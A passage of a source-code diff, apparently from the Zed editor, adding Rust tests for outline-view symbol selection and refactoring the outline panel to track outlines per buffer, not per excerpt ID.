depth_b)| { + depth_a.cmp(depth_b).then(ix_b.cmp(ix_a)) + }) + .map(|(ix, _)| ix) + .unwrap(); + (selected_candidate_id, deepest_containing_candidate_id) + }); + assert_eq!( + selected_candidate_id, expected_deepest_containing_candidate_id, + "Empty query should select the deepest symbol containing the cursor" + ); + + cx.dispatch_action(menu::Cancel); + cx.run_until_parked(); + + set_single_caret_at_row(&editor, 0, cx); + let outline_view = open_outline_view(&workspace, cx); + cx.run_until_parked(); + let selected_candidate_id = outline_view.read_with(cx, |outline_view, _| { + let delegate = &outline_view.delegate; + delegate.matches[delegate.selected_match_index].candidate_id + }); + assert_eq!( + selected_candidate_id, 0, + "Empty query should fall back to the first symbol when cursor is outside all symbol ranges" + ); + } + + #[gpui::test] + async fn test_outline_filtered_selection_prefers_first_match_on_score_ties( + cx: &mut TestAppContext, + ) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + path!("/dir"), + json!({ + "a.rs": indoc! 
{" + struct A; + impl A { + fn f(&self) {} + fn g(&self) {} + } + + struct B; + impl B { + fn f(&self) {} + fn g(&self) {} + } + + struct C; + impl C { + fn f(&self) {} + fn g(&self) {} + } + "} + }), + ) + .await; + + let project = Project::test(fs, [path!("/dir").as_ref()], cx).await; + project.read_with(cx, |project, _| { + project.languages().add(language::rust_lang()) + }); + + let (workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + + let workspace = cx.read(|cx| workspace.read(cx).workspace().clone()); + let worktree_id = workspace.update(cx, |workspace, cx| { + workspace.project().update(cx, |project, cx| { + project.worktrees(cx).next().unwrap().read(cx).id() + }) + }); + let _buffer = project + .update(cx, |project, cx| { + project.open_local_buffer(path!("/dir/a.rs"), cx) + }) + .await + .unwrap(); + let editor = workspace + .update_in(cx, |workspace, window, cx| { + workspace.open_path((worktree_id, rel_path("a.rs")), None, true, window, cx) + }) + .await + .unwrap() + .downcast::() + .unwrap(); + + assert_single_caret_at_row(&editor, 0, cx); + let outline_view = open_outline_view(&workspace, cx); + let match_ids = |outline_view: &Entity>, + cx: &mut VisualTestContext| { + outline_view.read_with(cx, |outline_view, _| { + let delegate = &outline_view.delegate; + let selected_match = &delegate.matches[delegate.selected_match_index]; + let scored_ids = delegate + .matches + .iter() + .filter(|m| m.score > 0.0) + .map(|m| m.candidate_id) + .collect::>(); + ( + selected_match.candidate_id, + *scored_ids.first().unwrap(), + *scored_ids.last().unwrap(), + scored_ids.len(), + ) + }) + }; + + outline_view + .update_in(cx, |outline_view, window, cx| { + outline_view + .delegate + .update_matches("f".to_string(), window, cx) + }) + .await; + let (selected_id, first_scored_id, last_scored_id, scored_match_count) = + match_ids(&outline_view, cx); + + assert!( + scored_match_count > 1, + "Expected multiple 
scored matches for `f` in outline filtering" + ); + assert_eq!( + selected_id, first_scored_id, + "Filtered query should pick the first scored match when scores tie" + ); + assert_ne!( + selected_id, last_scored_id, + "Selection should not default to the last scored match" + ); + + set_single_caret_at_row(&editor, 12, cx); + outline_view + .update_in(cx, |outline_view, window, cx| { + outline_view + .delegate + .update_matches("f".to_string(), window, cx) + }) + .await; + let (selected_id, first_scored_id, last_scored_id, scored_match_count) = + match_ids(&outline_view, cx); + + assert!( + scored_match_count > 1, + "Expected multiple scored matches for `f` in outline filtering" + ); + assert_eq!( + selected_id, first_scored_id, + "Filtered selection should stay score-ordered and not switch based on cursor proximity" + ); + assert_ne!( + selected_id, last_scored_id, + "Selection should not default to the last scored match" + ); + } + fn open_outline_view( workspace: &Entity, cx: &mut VisualTestContext, @@ -634,6 +884,18 @@ mod tests { }) } + fn set_single_caret_at_row( + editor: &Entity, + buffer_row: u32, + cx: &mut VisualTestContext, + ) { + editor.update_in(cx, |editor, window, cx| { + editor.change_selections(SelectionEffects::no_scroll(), window, cx, |s| { + s.select_ranges([rope::Point::new(buffer_row, 0)..rope::Point::new(buffer_row, 0)]) + }); + }); + } + fn init_test(cx: &mut TestAppContext) -> Arc { cx.update(|cx| { let state = AppState::test(cx); diff --git a/crates/outline_panel/Cargo.toml b/crates/outline_panel/Cargo.toml index fbcbd7ba74f42fc86976bb090102b86802cd4a1b..e88a0262907fcb22d1b954f25a5e74d8307bd174 100644 --- a/crates/outline_panel/Cargo.toml +++ b/crates/outline_panel/Cargo.toml @@ -33,6 +33,7 @@ settings.workspace = true smallvec.workspace = true smol.workspace = true theme.workspace = true +theme_settings.workspace = true ui.workspace = true util.workspace = true workspace.workspace = true diff --git 
a/crates/outline_panel/src/outline_panel.rs b/crates/outline_panel/src/outline_panel.rs index 445f63fa1cdc38cb358cf033cc49f404aa6e6d94..b7d5afcb687c017fdf253717a9dae2c95c55b53b 100644 --- a/crates/outline_panel/src/outline_panel.rs +++ b/crates/outline_panel/src/outline_panel.rs @@ -1,11 +1,11 @@ mod outline_panel_settings; use anyhow::Context as _; -use collections::{BTreeSet, HashMap, HashSet, hash_map}; -use db::kvp::KEY_VALUE_STORE; +use collections::{BTreeSet, HashMap, HashSet}; +use db::kvp::KeyValueStore; use editor::{ - AnchorRangeExt, Bias, DisplayPoint, Editor, EditorEvent, ExcerptId, ExcerptRange, - MultiBufferSnapshot, RangeToAnchorExt, SelectionEffects, + AnchorRangeExt, Bias, DisplayPoint, Editor, EditorEvent, ExcerptRange, MultiBufferSnapshot, + RangeToAnchorExt, SelectionEffects, display_map::ToDisplayPoint, items::{entry_git_aware_label_color, entry_label_color}, scroll::{Autoscroll, ScrollAnchor}, @@ -23,8 +23,9 @@ use gpui::{ uniform_list, }; use itertools::Itertools; -use language::language_settings::language_settings; +use language::language_settings::LanguageSettings; use language::{Anchor, BufferId, BufferSnapshot, OffsetRangeExt, OutlineItem}; + use menu::{Cancel, SelectFirst, SelectLast, SelectNext, SelectPrevious}; use std::{ cmp, @@ -46,7 +47,8 @@ use search::{BufferSearchBar, ProjectSearchView}; use serde::{Deserialize, Serialize}; use settings::{Settings, SettingsStore}; use smol::channel; -use theme::{SyntaxTheme, ThemeSettings}; +use theme::SyntaxTheme; +use theme_settings::ThemeSettings; use ui::{ ContextMenu, FluentBuilder, HighlightedLabel, IconButton, IconButtonShape, IndentGuideColors, IndentGuideLayout, ListItem, ScrollAxes, Scrollbars, Tab, Tooltip, WithScrollbar, prelude::*, @@ -60,6 +62,8 @@ use workspace::{ }; use worktree::{Entry, ProjectEntryId, WorktreeId}; +use crate::outline_panel_settings::OutlinePanelSettingsScrollbarProxy; + actions!( outline_panel, [ @@ -108,7 +112,6 @@ type HighlightStyleData = Arc, 
HighlightStyle)>>>; pub struct OutlinePanel { fs: Arc, - width: Option, project: Entity, workspace: WeakEntity, active: bool, @@ -126,12 +129,12 @@ pub struct OutlinePanel { selected_entry: SelectedEntry, active_item: Option, _subscriptions: Vec, - new_entries_for_fs_update: HashSet, + new_entries_for_fs_update: HashSet, fs_entries_update_task: Task<()>, cached_entries_update_task: Task<()>, reveal_selection_task: Task>, outline_fetch_tasks: HashMap>, - excerpts: HashMap>, + buffers: HashMap, cached_entries: Vec, filter_editor: Entity, mode: ItemsDisplayMode, @@ -237,7 +240,8 @@ impl SearchState { } let style = chunk .syntax_highlight_id - .and_then(|highlight| highlight.style(&theme)); + .and_then(|highlight| theme.get(highlight).cloned()); + if let Some(style) = style { let start = context_text.len(); let end = start + chunk.text.len(); @@ -330,42 +334,41 @@ enum CollapsedEntry { Dir(WorktreeId, ProjectEntryId), File(WorktreeId, BufferId), ExternalFile(BufferId), - Excerpt(BufferId, ExcerptId), - Outline(BufferId, ExcerptId, Range), + Excerpt(ExcerptRange), + Outline(Range), } -#[derive(Debug)] -struct Excerpt { - range: ExcerptRange, - outlines: ExcerptOutlines, +struct BufferOutlines { + excerpts: Vec>, + outlines: OutlineState, } -impl Excerpt { +impl BufferOutlines { fn invalidate_outlines(&mut self) { - if let ExcerptOutlines::Outlines(valid_outlines) = &mut self.outlines { - self.outlines = ExcerptOutlines::Invalidated(std::mem::take(valid_outlines)); + if let OutlineState::Outlines(valid_outlines) = &mut self.outlines { + self.outlines = OutlineState::Invalidated(std::mem::take(valid_outlines)); } } fn iter_outlines(&self) -> impl Iterator { match &self.outlines { - ExcerptOutlines::Outlines(outlines) => outlines.iter(), - ExcerptOutlines::Invalidated(outlines) => outlines.iter(), - ExcerptOutlines::NotFetched => [].iter(), + OutlineState::Outlines(outlines) => outlines.iter(), + OutlineState::Invalidated(outlines) => outlines.iter(), + 
OutlineState::NotFetched => [].iter(), } } fn should_fetch_outlines(&self) -> bool { match &self.outlines { - ExcerptOutlines::Outlines(_) => false, - ExcerptOutlines::Invalidated(_) => true, - ExcerptOutlines::NotFetched => true, + OutlineState::Outlines(_) => false, + OutlineState::Invalidated(_) => true, + OutlineState::NotFetched => true, } } } #[derive(Debug)] -enum ExcerptOutlines { +enum OutlineState { Outlines(Vec), Invalidated(Vec), NotFetched, @@ -532,54 +535,24 @@ impl SearchData { } } -#[derive(Clone, Debug, PartialEq, Eq, Hash)] -struct OutlineEntryExcerpt { - id: ExcerptId, - buffer_id: BufferId, - range: ExcerptRange, -} - -#[derive(Clone, Debug, Eq)] -struct OutlineEntryOutline { - buffer_id: BufferId, - excerpt_id: ExcerptId, - outline: Outline, -} - -impl PartialEq for OutlineEntryOutline { - fn eq(&self, other: &Self) -> bool { - self.buffer_id == other.buffer_id - && self.excerpt_id == other.excerpt_id - && self.outline.depth == other.outline.depth - && self.outline.range == other.outline.range - && self.outline.text == other.outline.text - } -} - -impl Hash for OutlineEntryOutline { - fn hash(&self, state: &mut H) { - ( - self.buffer_id, - self.excerpt_id, - self.outline.depth, - &self.outline.range, - &self.outline.text, - ) - .hash(state); - } -} - #[derive(Clone, Debug, PartialEq, Eq)] enum OutlineEntry { - Excerpt(OutlineEntryExcerpt), - Outline(OutlineEntryOutline), + Excerpt(ExcerptRange), + Outline(Outline), } impl OutlineEntry { - fn ids(&self) -> (BufferId, ExcerptId) { + fn buffer_id(&self) -> BufferId { match self { - OutlineEntry::Excerpt(excerpt) => (excerpt.buffer_id, excerpt.id), - OutlineEntry::Outline(outline) => (outline.buffer_id, outline.excerpt_id), + OutlineEntry::Excerpt(excerpt) => excerpt.context.start.buffer_id, + OutlineEntry::Outline(outline) => outline.range.start.buffer_id, + } + } + + fn range(&self) -> Range { + match self { + OutlineEntry::Excerpt(excerpt) => excerpt.context.clone(), + 
OutlineEntry::Outline(outline) => outline.range.clone(), } } } @@ -589,7 +562,7 @@ struct FsEntryFile { worktree_id: WorktreeId, entry: GitEntry, buffer_id: BufferId, - excerpts: Vec, + excerpts: Vec>, } impl PartialEq for FsEntryFile { @@ -627,7 +600,7 @@ impl Hash for FsEntryDirectory { #[derive(Debug, Clone, Eq)] struct FsEntryExternalFile { buffer_id: BufferId, - excerpts: Vec, + excerpts: Vec>, } impl PartialEq for FsEntryExternalFile { @@ -663,7 +636,6 @@ pub enum Event { #[derive(Serialize, Deserialize)] struct SerializedOutlinePanel { - width: Option, active: Option, } @@ -693,27 +665,24 @@ impl OutlinePanel { .ok() .flatten() { - Some(serialization_key) => cx - .background_spawn(async move { KEY_VALUE_STORE.read_kvp(&serialization_key) }) - .await - .context("loading outline panel") - .log_err() - .flatten() - .map(|panel| serde_json::from_str::(&panel)) - .transpose() - .log_err() - .flatten(), + Some(serialization_key) => { + let kvp = cx.update(|_, cx| KeyValueStore::global(cx))?; + cx.background_spawn(async move { kvp.read_kvp(&serialization_key) }) + .await + .context("loading outline panel") + .log_err() + .flatten() + .map(|panel| serde_json::from_str::(&panel)) + .transpose() + .log_err() + .flatten() + } None => None, }; workspace.update_in(&mut cx, |workspace, window, cx| { let panel = Self::new(workspace, serialized_panel.as_ref(), window, cx); - if let Some(serialized_panel) = serialized_panel { - panel.update(cx, |panel, cx| { - panel.width = serialized_panel.width.map(|px| px.round()); - cx.notify(); - }); - } + panel.update(cx, |_, cx| cx.notify()); panel }) } @@ -787,10 +756,8 @@ impl OutlinePanel { if ¤t_theme != new_theme { outline_panel_settings = *new_settings; current_theme = new_theme.clone(); - for excerpts in outline_panel.excerpts.values_mut() { - for excerpt in excerpts.values_mut() { - excerpt.invalidate_outlines(); - } + for buffer in outline_panel.buffers.values_mut() { + buffer.invalidate_outlines(); } outlines_invalidated = 
true; let update_cached_items = outline_panel.update_non_fs_items(window, cx); @@ -809,30 +776,23 @@ impl OutlinePanel { let new_depth = new_settings.expand_outlines_with_depth; - for (buffer_id, excerpts) in &outline_panel.excerpts { - for (excerpt_id, excerpt) in excerpts { - if let ExcerptOutlines::Outlines(outlines) = &excerpt.outlines { - for outline in outlines { - if outline_panel - .outline_children_cache - .get(buffer_id) - .and_then(|children_map| { - let key = - (outline.range.clone(), outline.depth); - children_map.get(&key) - }) - .copied() - .unwrap_or(false) - && (new_depth == 0 || outline.depth >= new_depth) - { - outline_panel.collapsed_entries.insert( - CollapsedEntry::Outline( - *buffer_id, - *excerpt_id, - outline.range.clone(), - ), - ); - } + for (buffer_id, buffer) in &outline_panel.buffers { + if let OutlineState::Outlines(outlines) = &buffer.outlines { + for outline in outlines { + if outline_panel + .outline_children_cache + .get(buffer_id) + .and_then(|children_map| { + let key = (outline.range.clone(), outline.depth); + children_map.get(&key) + }) + .copied() + .unwrap_or(false) + && (new_depth == 0 || outline.depth >= new_depth) + { + outline_panel.collapsed_entries.insert( + CollapsedEntry::Outline(outline.range.clone()), + ); } } } @@ -852,7 +812,7 @@ impl OutlinePanel { if !outlines_invalidated { let new_document_symbols = outline_panel - .excerpts + .buffers .keys() .filter_map(|buffer_id| { let buffer = outline_panel @@ -860,21 +820,15 @@ impl OutlinePanel { .read(cx) .buffer_for_id(*buffer_id, cx)?; let buffer = buffer.read(cx); - let doc_symbols = language_settings( - buffer.language().map(|l| l.name()), - buffer.file(), - cx, - ) - .document_symbols; + let doc_symbols = + LanguageSettings::for_buffer(buffer, cx).document_symbols; Some((*buffer_id, doc_symbols)) }) .collect(); if new_document_symbols != document_symbols_by_buffer { document_symbols_by_buffer = new_document_symbols; - for excerpts in 
outline_panel.excerpts.values_mut() { - for excerpt in excerpts.values_mut() { - excerpt.invalidate_outlines(); - } + for buffer in outline_panel.buffers.values_mut() { + buffer.invalidate_outlines(); } let update_cached_items = outline_panel.update_non_fs_items(window, cx); if update_cached_items { @@ -909,7 +863,6 @@ impl OutlinePanel { unfolded_dirs: HashMap::default(), selected_entry: SelectedEntry::None, context_menu: None, - width: None, active_item: None, pending_serialization: Task::ready(None), new_entries_for_fs_update: HashSet::default(), @@ -919,7 +872,7 @@ impl OutlinePanel { cached_entries_update_task: Task::ready(()), reveal_selection_task: Task::ready(Ok(())), outline_fetch_tasks: HashMap::default(), - excerpts: HashMap::default(), + buffers: HashMap::default(), cached_entries: Vec::new(), _subscriptions: vec![ settings_subscription, @@ -956,16 +909,15 @@ impl OutlinePanel { else { return; }; - let width = self.width; - let active = Some(self.active); + let active = self.active.then_some(true); + let kvp = KeyValueStore::global(cx); self.pending_serialization = cx.background_spawn( async move { - KEY_VALUE_STORE - .write_kvp( - serialization_key, - serde_json::to_string(&SerializedOutlinePanel { width, active })?, - ) - .await?; + kvp.write_kvp( + serialization_key, + serde_json::to_string(&SerializedOutlinePanel { active })?, + ) + .await?; anyhow::Ok(()) } .log_err(), @@ -1116,16 +1068,13 @@ impl OutlinePanel { PanelEntry::Fs(FsEntry::ExternalFile(file)) => { change_selection = false; scroll_to_buffer = Some(file.buffer_id); - multi_buffer_snapshot.excerpts().find_map( - |(excerpt_id, buffer_snapshot, excerpt_range)| { - if buffer_snapshot.remote_id() == file.buffer_id { - multi_buffer_snapshot - .anchor_in_excerpt(excerpt_id, excerpt_range.context.start) - } else { - None - } - }, - ) + multi_buffer_snapshot.excerpts().find_map(|excerpt_range| { + if excerpt_range.context.start.buffer_id == file.buffer_id { + 
multi_buffer_snapshot.anchor_in_excerpt(excerpt_range.context.start) + } else { + None + } + }) } PanelEntry::Fs(FsEntry::File(file)) => { @@ -1138,26 +1087,20 @@ impl OutlinePanel { .and_then(|path| project.get_open_buffer(&path, cx)) }) .map(|buffer| { - active_multi_buffer - .read(cx) - .excerpts_for_buffer(buffer.read(cx).remote_id(), cx) + multi_buffer_snapshot.excerpts_for_buffer(buffer.read(cx).remote_id()) }) - .and_then(|excerpts| { - let (excerpt_id, excerpt_range) = excerpts.first()?; - multi_buffer_snapshot - .anchor_in_excerpt(*excerpt_id, excerpt_range.context.start) + .and_then(|mut excerpts| { + let excerpt_range = excerpts.next()?; + multi_buffer_snapshot.anchor_in_excerpt(excerpt_range.context.start) }) } PanelEntry::Outline(OutlineEntry::Outline(outline)) => multi_buffer_snapshot - .anchor_in_excerpt(outline.excerpt_id, outline.outline.range.start) - .or_else(|| { - multi_buffer_snapshot - .anchor_in_excerpt(outline.excerpt_id, outline.outline.range.end) - }), + .anchor_in_excerpt(outline.range.start) + .or_else(|| multi_buffer_snapshot.anchor_in_excerpt(outline.range.end)), PanelEntry::Outline(OutlineEntry::Excerpt(excerpt)) => { change_selection = false; change_focus = false; - multi_buffer_snapshot.anchor_in_excerpt(excerpt.id, excerpt.range.context.start) + multi_buffer_snapshot.anchor_in_excerpt(excerpt.context.start) } PanelEntry::Search(search_entry) => Some(search_entry.match_range.start), }; @@ -1365,12 +1308,12 @@ impl OutlinePanel { PanelEntry::Outline(OutlineEntry::Excerpt(excerpt)) => { previous_entries.find(|entry| match entry { PanelEntry::Fs(FsEntry::File(file)) => { - file.buffer_id == excerpt.buffer_id - && file.excerpts.contains(&excerpt.id) + file.buffer_id == excerpt.context.start.buffer_id + && file.excerpts.contains(&excerpt) } PanelEntry::Fs(FsEntry::ExternalFile(external_file)) => { - external_file.buffer_id == excerpt.buffer_id - && external_file.excerpts.contains(&excerpt.id) + external_file.buffer_id == 
excerpt.context.start.buffer_id + && external_file.excerpts.contains(&excerpt) } _ => false, }) @@ -1378,8 +1321,16 @@ impl OutlinePanel { PanelEntry::Outline(OutlineEntry::Outline(outline)) => { previous_entries.find(|entry| { if let PanelEntry::Outline(OutlineEntry::Excerpt(excerpt)) = entry { - outline.buffer_id == excerpt.buffer_id - && outline.excerpt_id == excerpt.id + if outline.range.start.buffer_id != excerpt.context.start.buffer_id { + return false; + } + let Some(buffer_snapshot) = + self.buffer_snapshot_for_id(outline.range.start.buffer_id, cx) + else { + return false; + }; + excerpt.contains(&outline.range.start, &buffer_snapshot) + || excerpt.contains(&outline.range.end, &buffer_snapshot) } else { false } @@ -1488,13 +1439,7 @@ impl OutlinePanel { let context_menu = ContextMenu::build(window, cx, |menu, _, _| { menu.context(self.focus_handle.clone()) .action( - if cfg!(target_os = "macos") { - "Reveal in Finder" - } else if cfg!(target_os = "windows") { - "Reveal in File Explorer" - } else { - "Reveal in File Manager" - }, + ui::utils::reveal_in_file_manager_label(false), Box::new(RevealInFileManager), ) .action("Open in Terminal", Box::new(OpenInTerminal)) @@ -1596,13 +1541,11 @@ impl OutlinePanel { Some(CollapsedEntry::ExternalFile(external_file.buffer_id)) } PanelEntry::Outline(OutlineEntry::Excerpt(excerpt)) => { - Some(CollapsedEntry::Excerpt(excerpt.buffer_id, excerpt.id)) + Some(CollapsedEntry::Excerpt(excerpt.clone())) + } + PanelEntry::Outline(OutlineEntry::Outline(outline)) => { + Some(CollapsedEntry::Outline(outline.range.clone())) } - PanelEntry::Outline(OutlineEntry::Outline(outline)) => Some(CollapsedEntry::Outline( - outline.buffer_id, - outline.excerpt_id, - outline.outline.range.clone(), - )), PanelEntry::Search(_) => return, }; let Some(collapsed_entry) = entry_to_expand else { @@ -1703,14 +1646,10 @@ impl OutlinePanel { } PanelEntry::Outline(OutlineEntry::Excerpt(excerpt)) => self .collapsed_entries - 
.insert(CollapsedEntry::Excerpt(excerpt.buffer_id, excerpt.id)), - PanelEntry::Outline(OutlineEntry::Outline(outline)) => { - self.collapsed_entries.insert(CollapsedEntry::Outline( - outline.buffer_id, - outline.excerpt_id, - outline.outline.range.clone(), - )) - } + .insert(CollapsedEntry::Excerpt(excerpt.clone())), + PanelEntry::Outline(OutlineEntry::Outline(outline)) => self + .collapsed_entries + .insert(CollapsedEntry::Outline(outline.range.clone())), PanelEntry::Search(_) => false, }; @@ -1765,31 +1704,26 @@ impl OutlinePanel { } } - for (&buffer_id, excerpts) in &self.excerpts { - for (&excerpt_id, excerpt) in excerpts { - match &excerpt.outlines { - ExcerptOutlines::Outlines(outlines) => { - for outline in outlines { - to_uncollapse.insert(CollapsedEntry::Outline( - buffer_id, - excerpt_id, - outline.range.clone(), - )); - } + for (_buffer_id, buffer) in &self.buffers { + match &buffer.outlines { + OutlineState::Outlines(outlines) => { + for outline in outlines { + to_uncollapse.insert(CollapsedEntry::Outline(outline.range.clone())); } - ExcerptOutlines::Invalidated(outlines) => { - for outline in outlines { - to_uncollapse.insert(CollapsedEntry::Outline( - buffer_id, - excerpt_id, - outline.range.clone(), - )); - } + } + OutlineState::Invalidated(outlines) => { + for outline in outlines { + to_uncollapse.insert(CollapsedEntry::Outline(outline.range.clone())); } - ExcerptOutlines::NotFetched => {} } - to_uncollapse.insert(CollapsedEntry::Excerpt(buffer_id, excerpt_id)); + OutlineState::NotFetched => {} } + to_uncollapse.extend( + buffer + .excerpts + .iter() + .map(|excerpt| CollapsedEntry::Excerpt(excerpt.clone())), + ); } for cached in &self.cached_entries { @@ -1856,14 +1790,10 @@ impl OutlinePanel { .. 
}) => Some(CollapsedEntry::Dir(*worktree_id, entries.last()?.id)), PanelEntry::Outline(OutlineEntry::Excerpt(excerpt)) => { - Some(CollapsedEntry::Excerpt(excerpt.buffer_id, excerpt.id)) + Some(CollapsedEntry::Excerpt(excerpt.clone())) } PanelEntry::Outline(OutlineEntry::Outline(outline)) => { - Some(CollapsedEntry::Outline( - outline.buffer_id, - outline.excerpt_id, - outline.outline.range.clone(), - )) + Some(CollapsedEntry::Outline(outline.range.clone())) } PanelEntry::Search(_) => None, }, @@ -1951,17 +1881,13 @@ impl OutlinePanel { } } PanelEntry::Outline(OutlineEntry::Excerpt(excerpt)) => { - let collapsed_entry = CollapsedEntry::Excerpt(excerpt.buffer_id, excerpt.id); + let collapsed_entry = CollapsedEntry::Excerpt(excerpt.clone()); if !self.collapsed_entries.remove(&collapsed_entry) { self.collapsed_entries.insert(collapsed_entry); } } PanelEntry::Outline(OutlineEntry::Outline(outline)) => { - let collapsed_entry = CollapsedEntry::Outline( - outline.buffer_id, - outline.excerpt_id, - outline.outline.range.clone(), - ); + let collapsed_entry = CollapsedEntry::Outline(outline.range.clone()); if !self.collapsed_entries.remove(&collapsed_entry) { self.collapsed_entries.insert(collapsed_entry); } @@ -2115,6 +2041,8 @@ impl OutlinePanel { let project = self.project.clone(); self.reveal_selection_task = cx.spawn_in(window, async move |outline_panel, cx| { cx.background_executor().timer(UPDATE_DEBOUNCE).await; + let multibuffer_snapshot = + editor.read_with(cx, |editor, cx| editor.buffer().read(cx).snapshot(cx)); let entry_with_selection = outline_panel.update_in(cx, |outline_panel, window, cx| { outline_panel.location_for_editor_selection(&editor, window, cx) @@ -2144,14 +2072,28 @@ impl OutlinePanel { }) }), PanelEntry::Outline(outline_entry) => { - let (buffer_id, excerpt_id) = outline_entry.ids(); + let buffer_id = outline_entry.buffer_id(); + let outline_range = outline_entry.range(); outline_panel.update(cx, |outline_panel, cx| { outline_panel 
.collapsed_entries .remove(&CollapsedEntry::ExternalFile(buffer_id)); - outline_panel - .collapsed_entries - .remove(&CollapsedEntry::Excerpt(buffer_id, excerpt_id)); + if let Some(buffer_snapshot) = + outline_panel.buffer_snapshot_for_id(buffer_id, cx) + { + outline_panel.collapsed_entries.retain(|entry| match entry { + CollapsedEntry::Excerpt(excerpt_range) => { + let intersects = excerpt_range.context.start.buffer_id + == buffer_id + && (excerpt_range + .contains(&outline_range.start, &buffer_snapshot) + || excerpt_range + .contains(&outline_range.end, &buffer_snapshot)); + !intersects + } + _ => true, + }); + } let project = outline_panel.project.read(cx); let entry_id = project .buffer_for_id(buffer_id, cx) @@ -2172,11 +2114,9 @@ impl OutlinePanel { })? } PanelEntry::Fs(FsEntry::ExternalFile(..)) => None, - PanelEntry::Search(SearchEntry { match_range, .. }) => match_range - .start - .text_anchor - .buffer_id - .or(match_range.end.text_anchor.buffer_id) + PanelEntry::Search(SearchEntry { match_range, .. 
}) => multibuffer_snapshot + .anchor_to_buffer_anchor(match_range.start) + .map(|(anchor, _)| anchor.buffer_id) .map(|buffer_id| { outline_panel.update(cx, |outline_panel, cx| { outline_panel @@ -2258,30 +2198,30 @@ impl OutlinePanel { fn render_excerpt( &self, - excerpt: &OutlineEntryExcerpt, + excerpt: &ExcerptRange, depth: usize, window: &mut Window, cx: &mut Context, ) -> Option> { - let item_id = ElementId::from(excerpt.id.to_proto() as usize); + let item_id = ElementId::from(format!("{excerpt:?}")); let is_active = match self.selected_entry() { Some(PanelEntry::Outline(OutlineEntry::Excerpt(selected_excerpt))) => { - selected_excerpt.buffer_id == excerpt.buffer_id && selected_excerpt.id == excerpt.id + selected_excerpt == excerpt } _ => false, }; let has_outlines = self - .excerpts - .get(&excerpt.buffer_id) - .and_then(|excerpts| match &excerpts.get(&excerpt.id)?.outlines { - ExcerptOutlines::Outlines(outlines) => Some(outlines), - ExcerptOutlines::Invalidated(outlines) => Some(outlines), - ExcerptOutlines::NotFetched => None, + .buffers + .get(&excerpt.context.start.buffer_id) + .and_then(|buffer| match &buffer.outlines { + OutlineState::Outlines(outlines) => Some(outlines), + OutlineState::Invalidated(outlines) => Some(outlines), + OutlineState::NotFetched => None, }) .is_some_and(|outlines| !outlines.is_empty()); let is_expanded = !self .collapsed_entries - .contains(&CollapsedEntry::Excerpt(excerpt.buffer_id, excerpt.id)); + .contains(&CollapsedEntry::Excerpt(excerpt.clone())); let color = entry_label_color(is_active); let icon = if has_outlines { FileIcons::get_chevron_icon(is_expanded, cx) @@ -2291,7 +2231,7 @@ impl OutlinePanel { } .unwrap_or_else(empty_icon); - let label = self.excerpt_label(excerpt.buffer_id, &excerpt.range, cx)?; + let label = self.excerpt_label(&excerpt, cx)?; let label_element = Label::new(label) .single_line() .color(color) @@ -2309,13 +2249,8 @@ impl OutlinePanel { )) } - fn excerpt_label( - &self, - buffer_id: BufferId, - 
range: &ExcerptRange, - cx: &App, - ) -> Option { - let buffer_snapshot = self.buffer_snapshot_for_id(buffer_id, cx)?; + fn excerpt_label(&self, range: &ExcerptRange, cx: &App) -> Option { + let buffer_snapshot = self.buffer_snapshot_for_id(range.context.start.buffer_id, cx)?; let excerpt_range = range.context.to_point(&buffer_snapshot); Some(format!( "Lines {}- {}", @@ -2326,19 +2261,19 @@ impl OutlinePanel { fn render_outline( &self, - outline: &OutlineEntryOutline, + outline: &Outline, depth: usize, string_match: Option<&StringMatch>, window: &mut Window, cx: &mut Context, ) -> Stateful
{ let item_id = ElementId::from(SharedString::from(format!( - "{:?}|{:?}{:?}|{:?}", - outline.buffer_id, outline.excerpt_id, outline.outline.range, &outline.outline.text, + "{:?}|{:?}", + outline.range, &outline.text, ))); let label_element = outline::render_item( - &outline.outline, + &outline, string_match .map(|string_match| string_match.ranges().collect::>()) .unwrap_or_default(), @@ -2347,26 +2282,22 @@ impl OutlinePanel { .into_any_element(); let is_active = match self.selected_entry() { - Some(PanelEntry::Outline(OutlineEntry::Outline(selected))) => { - outline == selected && outline.outline == selected.outline - } + Some(PanelEntry::Outline(OutlineEntry::Outline(selected))) => outline == selected, _ => false, }; let has_children = self .outline_children_cache - .get(&outline.buffer_id) + .get(&outline.range.start.buffer_id) .and_then(|children_map| { - let key = (outline.outline.range.clone(), outline.outline.depth); + let key = (outline.range.clone(), outline.depth); children_map.get(&key) }) .copied() .unwrap_or(false); - let is_expanded = !self.collapsed_entries.contains(&CollapsedEntry::Outline( - outline.buffer_id, - outline.excerpt_id, - outline.outline.range.clone(), - )); + let is_expanded = !self + .collapsed_entries + .contains(&CollapsedEntry::Outline(outline.range.clone())); let icon = if has_children { FileIcons::get_chevron_icon(is_expanded, cx) @@ -2796,7 +2727,7 @@ impl OutlinePanel { let mut new_collapsed_entries = HashSet::default(); let mut new_unfolded_dirs = HashMap::default(); let mut root_entries = HashSet::default(); - let mut new_excerpts = HashMap::>::default(); + let mut new_buffers = HashMap::::default(); let Ok(buffer_excerpts) = outline_panel.update(cx, |outline_panel, cx| { let git_store = outline_panel.project.read(cx).git_store().clone(); new_collapsed_entries = outline_panel.collapsed_entries.clone(); @@ -2805,13 +2736,18 @@ impl OutlinePanel { multi_buffer_snapshot.excerpts().fold( HashMap::default(), - |mut 
buffer_excerpts, (excerpt_id, buffer_snapshot, excerpt_range)| { + |mut buffer_excerpts, excerpt_range| { + let Some(buffer_snapshot) = multi_buffer_snapshot + .buffer_for_id(excerpt_range.context.start.buffer_id) + else { + return buffer_excerpts; + }; let buffer_id = buffer_snapshot.remote_id(); let file = File::from_dyn(buffer_snapshot.file()); let entry_id = file.and_then(|file| file.project_entry_id()); let worktree = file.map(|file| file.worktree.read(cx).snapshot()); - let is_new = new_entries.contains(&excerpt_id) - || !outline_panel.excerpts.contains_key(&buffer_id); + let is_new = new_entries.contains(&buffer_id) + || !outline_panel.buffers.contains_key(&buffer_id); let is_folded = active_editor.read(cx).is_buffer_folded(buffer_id, cx); let status = git_store .read(cx) @@ -2825,29 +2761,28 @@ impl OutlinePanel { (is_new, is_folded, Vec::new(), entry_id, worktree, status) }) .2 - .push(excerpt_id); + .push(excerpt_range.clone()); - let outlines = match outline_panel - .excerpts - .get(&buffer_id) - .and_then(|excerpts| excerpts.get(&excerpt_id)) - { - Some(old_excerpt) => match &old_excerpt.outlines { - ExcerptOutlines::Outlines(outlines) => { - ExcerptOutlines::Outlines(outlines.clone()) + new_buffers + .entry(buffer_id) 